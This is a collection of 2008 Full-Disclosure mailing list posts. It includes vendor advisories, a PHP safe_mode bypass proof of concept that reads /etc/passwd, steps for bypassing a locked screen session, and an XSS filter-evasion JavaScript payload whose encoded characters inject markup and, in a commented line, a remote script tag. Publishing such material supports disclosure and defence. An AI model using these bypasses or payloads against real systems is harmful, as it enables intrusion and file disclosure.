RETURN_TRUE;
}
- ---

var_dump(posix_access("http://../../../etc/passwd";))==True
var_dump(posix_access("/etc/passwd"))==False

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); will change 
"http://../../../etc/passwd"; to path=/etc/passwd

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, 
CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check realy path 
"http://../../../etc/passwd";. http:// is using in php_checkuid_ex(), so 
safe_mode is bypassed.

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

- --- 2. How to Fix ---
Do not use safe_mode as a main safety

- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0
n4Sg31DePRpr4h3PLouKFoA=
=6qwD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] xss dot(.) filter evasion

[Thomas Pollet]

Hello,

so,

with (String) { eval(fromCharCode( /* insert charcodes here */ ) )}

is what i needed

Regards,
Thomas Pollet

2008/6/18 Thomas Pollet <[EMAIL PROTECTED]>:
> Hello,
>
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?
>
> 
>  
>
>
>  
>  
> 
> function write(str){
>//document.write() doesn't work as it becomes document_write()
>var s = /write/;
>var w = String();
>var n = String();
>w += s;
>//cast to string so we can index
>w += s;
>n += w[1] + w[2] + w[3] + w[4] + w[5];
>//call document['write']
>document[n](str);
> }
> var s = /fromCharCode/;
> var w = String();
> var n = String();
> w += s;
> n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
> w[11] + w[12];
>
> write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
> 62,104,60,47,97,62));
>
> /*
> write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
> ,111,109,34,62));
> */
>
> 
>  
> 
>
> Regards,
> Thoms Pollet
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

[A . L . M . Buxey]

Hi,

> There are actually studies going on RIGHT NOW to see if phones can be 
> allowed to be used during flights by the FCC/FAA, and in other countries as 
> well.

several european carriers now allow mobiles to be used in flight. - i'm
bothered more by the person inanely chatting during the flight than
security issues - hopefully the hold luggage has been properly scanned
anyway - or a dumb timer would do just as well as a mobile.

PS lots of people dont turn their phones off. lots of people talk
on their phones before going through customs etc. 

alan

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

[Ureleet]

On Wed, Jun 18, 2008 at 12:26 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.
>

do u make money from saying his name?  you use it in enuff of ur emails.

joel - ignore him.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast

[Joel Esler]

On Jun 18, 2008, at 12:26 PM, n3td3v wrote:


Joel Esler said he doesn't switch his phone off on flights and that
anyone who is on a plane with him should watch out.


First of all, I said "before I got the iPhone with the 'airplane'  
mode"  I'd forget to turn off my phone alot, i'd throw it in my  
briefcase when I'd go through security, and forget it's in there.   
Heck I've seen people actually been able to receive calls on their  
crackberries while in mid flight.  Not that they answered them.  But  
I've seen the phones ring.  I have an iPhone now, I place it in  
airplane mode when I get on a flight.


There are actually studies going on RIGHT NOW to see if phones can be  
allowed to be used during flights by the FCC/FAA, and in other  
countries as well.


Personally I hope this doesn't go through, as I don't want to be  
sitting next to some dude during my 100,000+ miles I fly a year to  
hear yacking the whole flight.




Is this some kind of dry american humour that i'm missing here or is
that not even funny?


yes, It was a joke.  Sorry if it was in bad taste.


--
Joel Esler
  [EMAIL PROTECTED]
  http://blog.joelesler.net
[m]



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo Frame Denial of Service

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo
 Frame Denial of Service

Advisory ID: cisco-sa-20080618-ips


Revision 1.0

For Public Release 2008 June 18 1600 UTC (GMT)

+-

Summary
===

Cisco Intrusion Prevention System (IPS) platforms that have gigabit
network interfaces installed and are deployed in inline mode contain
a denial of service vulnerability in the handling of jumbo Ethernet
frames. This vulnerability may lead to a kernel panic that requires a
power cycle to recover platform operation. Platforms deployed in
promiscuous mode only or that do not contain gigabit network
interfaces are not vulnerable.

Cisco has released free software updates that address this
vulnerability. There is a workaround for this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080618-ips.shtml.

Affected Products
=

Vulnerable Products
+--

The following Cisco IPS versions are affected:

  * Cisco Intrusion Prevention System version 5.x prior to 5.1(8)E2
  * Cisco Intrusion Prevention System version 6.x prior to 6.0(5)E2

The following Cisco IPS platforms ship with gigabit network
interfaces and are vulnerable if they are deployed in inline mode:

  * 4235
  * 4240
  * 4250
  * 4250SX *
  * 4250TX
  * 4250XL *
  * 4255
  * 4260
  * 4270

* The 4250SX and 4250XL models ship with gigabit network interfaces
that are normally used for remote administration and monitoring. If
the gigabit network interfaces are configured for use with inline
mode, the platform is vulnerable.

To determine the version of software that is running on a Cisco IPS
platform, log into the platform using the console or Secure Shell
(SSH) and issue the show version command.

sensor# show version 
Application Partition:

Cisco Intrusion Prevention System, Version 6.0(4a)E1

To determine whether a Cisco IPS platform has interfaces configured
for inline mode, log into the platform using the console or SSH and
issue the show interfaces command. Look for paired interfaces in the
Inline Mode statement of the command output.

sensor# show interfaces
...
MAC statistics from interface GigabitEthernet0/1
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/0
...
MAC statistics from interface GigabitEthernet0/0
   Interface function = Sensing interface
   Description =
   Media Type = TX
   Missed Packet Percentage = 0
   Inline Mode = Paired with interface GigabitEthernet0/1

Products Confirmed Not Vulnerable
+

The following Cisco IPS platforms are not vulnerable:

  * 4210
  * 4215
  * SSM-AIP10
  * SSM-AIP20
  * SSM-AIP40
  * AIM-IPS
  * NM-CIDS
  * IDSM2

Cisco IPS version 6.1(1) is not vulnerable. Cisco IOS with the
Intrusion Prevention System feature is not vulnerable. No other Cisco
products are currently known to be affected by this vulnerability.

Details
===

Certain Cisco IPS platforms contain a denial of service vulnerability
in the handling of jumbo ethernet frames. When a specific series of
jumbo Ethernet frames is received on a gigabit network interface of a
vulnerable Cisco IPS platform that is deployed in inline mode, a
kernel panic may occur that results in the complete failure of the
platform and causes a network denial of service condition. Cisco IPS
platforms that are deployed in promiscuous mode only or that do not
contain gigabit network interfaces are not vulnerable.

Jumbo Ethernet support is usually deployed in data center
environments to increase inter-server communication performance and
is not a default configuration for Cisco routers and switches.
Support for jumbo Ethernet frames must be enabled on each device that
require the feature. In order to exploit this vulnerability, an
attacker must be able to inject jumbo Ethernet frames to a vulnerable
Cisco IPS platform that is deployed in inline mode.

If they are configured to use bypass mode to allow traffic to pass in
the event of a system failure, all Cisco IPS platforms will fail to
forward traffic except for the 4260 and 4270 platforms. The Cisco IPS
4260 and 4270 platforms contain a hardware bypass feature that allows
them to pass network traffic in the event of a kernel panic or power
outage. They will pass traffic by default if the hardware bypass
feature is engaged.

This vulnerability is documented in Cisco Bug ID CSCso64762 and has
been assigned Common Vulnerabilities and Exposures (CVE) ID 
CVE-2008-2060.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this

[Full-disclosure] Joel Esler comment on Sans ISC podcast

[n3td3v]

Joel Esler said he doesn't switch his phone off on flights and that
anyone who is on a plane with him should watch out.

Is this some kind of dry american humour that i'm missing here or is
that not even funny?

I'm asking the TSA to listen to his comments made in audio format and
decide if this individual should be banned from flying.

http://isc.sans.org/diary.html?storyid=4568

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] xss dot(.) filter evasion

[Thomas Pollet]

Hello,

I came across this site that implemented some filtering so the dots were
replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to
the page using String.fromCharCode)
Someone knows a different way to do this?


 
   
   
 
 

function write(str){
   //document.write() doesn't work as it becomes document_write()
   var s = /write/;
   var w = String();
   var n = String();
   w += s;
   //cast to string so we can index
   w += s;
   n += w[1] + w[2] + w[3] + w[4] + w[5];
   //call document['write']
   document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
w[11] + w[12];

write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
62,104,60,47,97,62));

/*
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
,111,109,34,62));
*/


 


Regards,
Thoms Pollet
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities

[Secunia Research]

==

 Secunia Research 18/06/2008

   - TorrentTrader Multiple SQL Injection Vulnerabilities -

==
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

==
1) Affected Software

* TorrentTrader 1.08 Classic Edition downloaded before 2008-06-17

NOTE: Other versions may also be affected.

==
2) Severity

Rating: Moderately Critical
Impact: Exposure of sensitive information
Manipulation of data
Where:  Remote

==
3) Vendor's Description of Software

"TorrentTrader is a feature packed and highly customisable PHP/MySQL
Based BitTorrent tracker. Featuring intergrated forums, and plenty
of administration options."

Product Link:
http://www.torrenttrader.org/

==
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in TorrentTrader,
which can be exploited by malicious people and malicious users to
conduct SQL injection attacks.

1) Input passed to the "email" and "wantusername" parameters in
account-signup.php is not properly sanitised before being used in SQL
queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Successful exploitation of this vulnerability allows e.g. retrieval of
administrator password hashes, but requires that "magic_quotes_gpc" is
disabled and that the site is not configured as invite-only.

2) Input passed to the "receiver" parameter in account-inbox.php (when
"msg" is set) is not properly sanitised before being used in SQL
queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Successful exploitation of this vulnerability requires valid user
credentials and that "magic_quotes_gpc" is disabled.

==
5) Solution

Update to TorrentTrader 1.08 Classic Edition downloaded on 2008-06-17
or later.

==
6) Time Table

10/06/2008: Contacted the vendor.
17/06/2008: Contacted the vendor again.
17/06/2008: Vendor asks for PoC.
17/06/2008: Sent PoC to the vendor.
17/06/2008: Vendor releases a fixed version.
18/06/2008: Public disclosure.

==
7) Credits

Discovered by Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2428 for the vulnerabilities.

==
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-15/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

___
Full-Disclosure - W

[Full-disclosure] Flaw in Firefox 3.0: protocol-handler.warn-external are ignored

[carl hardwick]

these protocol-handler security settings are ignored although they're
set to 'true' and no warnings are shown:

network.protocol-handler.warn-external.mailto
network.protocol-handler.warn-external.news
network.protocol-handler.warn-external.nntp
network.protocol-handler.warn-external.snews
(in about:config)

For example,
I set network.protocol-handler.warn-external.mailto to 'true', clicked
on an e-mail link and Windows Mail is launched without any warnings
(tested on Firefox 3.0 on Windows Vista SP1)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)

[rembrandt]

Well I improved the advisory I released a while ago after I found serval
websites wich claim that this is a fake/myth sec. problem because they
where not able to reproduce it onto their boxes...

The updated version is avaiable at milw0rm (thanks to str0ke) and I
recomment that all who mirrored the article do update.

milw0rm link:
http://www.milw0rm.com/exploits/4028

I even included a lil example to make it fool proof... I was realy
impressed that some do think it's a fake/myth and claim that onto their
website.

So it would be nice if the guys at osvdb.org (and others) may do update
their articles, rating and what else matters for them to correct their
statements

I named a now OS and how to reproduce it.
So feel free to install oBSD in a VM. ;]

The new version of the "improved" advisory is attached too for your
convenience. The bug itself is still the old one


Kind regards,
Rembrandt _   _ _ _ ___ _ _   _
   / / / / / /   /  _/_  __/ / / /
  / /_/ / __/ / // /  / / / /_/ /
 / __  / /___/ // /  / / / __  /
/_/ /_/_/_/___/ /_/ /_/ /_/
   Helith - 0815


Author: Rembrandt
Date  : Known since somewhere in &cant_remember (some years, realy..)
Affected Software: screen <= 4.0.3
Affected OS  : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people 


I did not found a Advisory related to this so I decided to write a leet one.

screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password: 
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven   (Attached)
25144.ttyC1.raven   (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$ 

Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.

Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.

All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.

Have fun!


Kind regards,
Rembrandt___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] The Extended HTML Form attack revisited

[Sandro Gauci]

Hi -

Back in 2002 I had published details of a vulnerability affecting most
web browsers. It detailed a security flaw that allows attackers to
abuse non-HTTP protocols to launch Cross Site Scripting attacks even
when a target web application was not vulnerable to XSS.

Six years later I'm releasing an update to this research in this
paper. This security vulnerability still affects popular web browsers
nowadays and the following browsers were tested as vulnerable:

   * Internet Explorer 6
   * Internet Explorer 7
   * Internet Explorer 8 (beta 1)
   * Opera 9.27
   * Opera 9.50
   * Safari 1.32
   * Safari 3.1.1

Others have described how to abuse behavior for purposes other than
Cross Site Scripting. NGSSoftware previously published a paper called
"Inter-Protocol Exploitation" which references the original EyeonSecurity paper.

Paper at:
http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf

or http://tinyurl.com/5d88ll

--
Sandro Gauci
EnableSecurity
Web: http://enablesecurity.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA ARCserve Backup Discovery Service Denial of Service Vulnerability

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Title: CA ARCserve Backup Discovery Service Denial of Service 
Vulnerability


CA Advisory Date: 2008-06-17


Reported By: Luigi Auriemma


Impact: A remote attacker can cause a denial of service.


Summary: CA ARCserve Backup contains a vulnerability in the 
Discovery service (casdscsvc) that can allow a remote attacker to 
cause a denial of service condition. CA has issued patches to 
address the vulnerability. The vulnerability, CVE-2008-1979, 
occurs due to insufficient verification of client data. An 
attacker can make a request that can crash the service.


Mitigating Factors: None


Severity: CA has given this vulnerability a Medium risk rating.


Affected Products:
CA ARCserve Backup r12.0 Windows
CA ARCserve Backup r11.5 Windows SP3 and prior*
CA ARCserve Backup r11.1 Windows*
CA ARCserve Backup r11.1 Netware*
CA Server Protection Suite r2
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server 
   Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server 
   Premium Edition r2

*Formerly known as BrightStor ARCserve Backup


Non-affected Products:
CA ARCserve Backup r11.5 Windows SP4


Affected Platforms:
Windows and Netware


Status and Recommendation:
CA has issued the following patches to address the 
vulnerabilities. 
CA ARCserve Backup r12.0 Windows: QO99574
CA ARCserve Backup r11.5 Windows: QO99575
For CA ARCserve Backup r11.5 Windows, the issue can also be 
addressed by applying 11.5 SP4: QO99129
CA ARCserve Backup r11.1 Windows: QO99576
CA ARCserve Backup r11.1 Netware: QO99579
CA Protection Suites r2: QO99575


How to determine if you are affected:

CA ARCserve Backup r12.0 Windows:

1. Run the ARCserve Patch Management utility. From the Windows 
   Start menu, it can be found under Programs->CA->ARCserve Patch 
   Management->Patch Status.
2. The main patch status screen will indicate if patch “QO99574” 
   is currently applied. If the patch is not applied, the 
   installation is vulnerable.

For more information on the ARCserve Patch Management utility, 
read document TEC446265.

Alternatively, use the file information below to determine if the 
product installation is vulnerable.

CA ARCserve Backup r12.0 Windows,
CA ARCserve Backup r11.5 Windows,
CA ARCserve Backup r11.1 Windows,
CA ARCserve Backup r11.1 Netware,
CA Protection Suites r2*:

1. Using Windows Explorer, locate the file “asbrdcst.dll”. By 
   default, the file is located in the 
   “C:\Program Files\CA\SharedComponents\ARCserve Backup\CADS” 
   directory on 32 bit systems and “C:\Program Files (x86)\CA\
   SharedComponents\ARCserve Backup\CADS” on 64 bit systems.
2. Right click on the file and select Properties.
3. Select the General tab.
4. If the file timestamp is earlier than indicated in the below 
   table, the installation is vulnerable.

* For Protection Suites r2, use the file timestamp for CA ARCserve 
  Backup r11.5 English

Product Ver   Product Lang  File Name File Sz Timestamp
  (bytes)
12.0 Windows  English   asbrdcst.dll  324872  05/01/2008 12:11
12.0 Windows  Spanish   asbrdcst.dll  324872  05/01/2008 12:11
12.0 Windows  Port-Braz asbrdcst.dll  320776  05/01/2008 12:11
12.0 Windows  Japanese  asbrdcst.dll  320776  05/01/2008 12:11
12.0 Windows  Italian   asbrdcst.dll  324872  05/01/2008 12:11
12.0 Windows  Germanasbrdcst.dll  324872  05/01/2008 12:11
12.0 Windows  Frenchasbrdcst.dll  324872  05/01/2008 12:11
12.0 Windows  Trad Chinese  asbrdcst.dll  316680  05/01/2008 12:11
12.0 Windows  Simp Chinese  asbrdcst.dll  316680  05/01/2008 12:11
11.5 Windows  English   asbrdcst.dll  212992  04/22/2008 10:15:02
11.5 Windows  Japanese  asbrdcst.dll  208896  04/22/2008 14:28:52
11.5 Windows  Simp Chinese  asbrdcst.dll  204800  04/22/2008 14:30:54
11.5 Windows  Trad Chinese  asbrdcst.dll  204800  04/22/2008 14:33:28
11.5 Windows  Italian   asbrdcst.dll  212992  04/22/2008 14:31:46
11.5 Windows  Port-Braz asbrdcst.dll  212992  04/22/2008 14:53:54
11.5 Windows  Germanasbrdcst.dll  212992  04/22/2008 14:27:48
11.5 Windows  Frenchasbrdcst.dll  212992  04/22/2008 14:26:54
11.5 Windows  Spanish   asbrdcst.dll  212992  04/22/2008 14:32:38
11.1 Windows  English   asbrdcst.dll  204800  04/24/2008 11:21:26
11.1 Windows  Japanese  asbrdcst.dll  200704  04/24/2008 11:25:48
11.1 Windows  Simp Chinese  asbrdcst.dll  196608  04/24/2008 11:27:44
11.1 Windows  Trad Chinese  asbrdcst.dll  196608  04/24/2008 11:30:32
11.1 Windows  Italian   asbrdcst.dll  204800  04/24/2008 11:28:38
11.1 Windows  Port-Braz asbrdcst.dll  204800  04/24/2008 11:38:52
11.1 Windows  Germanasbrdcst.dll  204800  04/24/2008 11:24:38
11.1 Windows  Frenchasbrdcst.dll  204800  04/24/2008 11:23:38
11.1 Windows  Spanish   asbrdcst.dll  204800  04/24/2008 11:29:34
11.1 Windows  Dutch asbrdcst.dl

[Full-disclosure] Announcement && CFP: ISOI 5, Tallinn Estonia

[Gadi Evron]

The internet Security Operations and Intelligence (ISOI) 5th workshop will 
take place on the 11th and 12th of September, 2008.

Venue: Tallinn, Estonia.
Host: Estonian CERT (www.cert.ee).

Attendance:
While payment is not required, to attend you must be a member of one of 
the vetted operational communities, or contact us directly for special 
consideration.

CFP information:
The topics for the CFP include operational nsp security, Internet 
incident response, Internet fraud, cyber crime investigations and general 
case studies.

You can email your suggestions, including a title, short abstract and 
prefered day and time to me personally up to the 28th of July. Late 
submissions for turbo-talks is possible.

For more information you can check out the web pages for previous ISOI 
workshops:

Yahoo - http://isotf.org/isoi44html
ICANN/ISOC/Afilias - http://isotf.org/isoi3.html
Microsoft - http://isotf.org/isoi2.html
Cisco - http://isotf.org/isoi.html

A perliminary program will become available in a few weeks on:
http://isotf.org/isoi5.html

Gadi Evron && Randy Vaughn.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Skype chat encryption with OTR

[Fabio Pietrosanti (naif)]

For all you OS X guys that like skype because of it's usability but are 
concerned about the lacks of and end-to-end message encryption system (a 
plug-in for skype).

Today i tried:

#1 Get and install Adium (I suggest portable adium in a separated 
filevault volume)
http://www.freesmug.org/portableapps/adium/

#2 Get and install Skype plug-in for Adium
 http://myjobspace.co.nz/images/pidgin/

#3 Enable OTR encryption on Skype chat (trough Adium client)
 http://www.cypherpunks.ca/otr/

Et voilà, end-to-end deniable encryption for Skype chat messages.

The funny thing is that you can see the encrypted chat and key exchange 
on standard Skype messaging window, so you can verify yourself that all 
stuff are enciphered.

Now i feel myself more comfortable and will sleep +10minutes each night.

Cheers

Fabio/naif

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/